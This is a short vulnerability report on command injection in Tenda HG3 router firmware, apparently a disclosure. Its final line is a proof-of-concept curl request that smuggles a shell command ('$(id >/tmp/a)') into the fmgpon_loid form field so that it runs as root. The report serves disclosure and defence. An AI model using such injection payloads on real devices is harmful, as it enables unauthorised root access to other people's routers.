Vendor of the products: Tenda
Vendor’s website: https://www.tendacn.com/
Reported by: Zhuang Haoran (1851805232@163.com)
Affected models and versions :
Tenda HG3 (HARD_VERSION=V2.0 , Version: 300003070)
Firmware download address:
https://www.tendacn.com/material/show/787197496692805
An remote code execution exists in Tenda-HG3 IoT devices . This vulnerability is caused by no No filter parameters errors, leading to command concatenation. Attackers can exploit this vulnerability to access internal interfaces, thereby execute arbitrary code on IoT.
When the URL is,/boaform/admin/formgponConf, call function pointers according to the formgponConf
Without any filter parameters, they were concatenated into the command
when we make the fmgpon_loid or fmgpon_loid_password by ‘”$(<command>)”’
the command will enforced with root
curl -i 'http://127.0.0.1:8088/boaform/admin/formgponConf' -H 'Content-Type: application/x-www-form-urlencoded' --data 'fmgpon_loid=te"$(id >/tmp/a)"st&fmgpon_loid_password=test12345&fmgpon_ploam_password=ploam12345&omci_olt_mode=0&apply=Apply+Changes&submit-url=%2Fgpon.asp'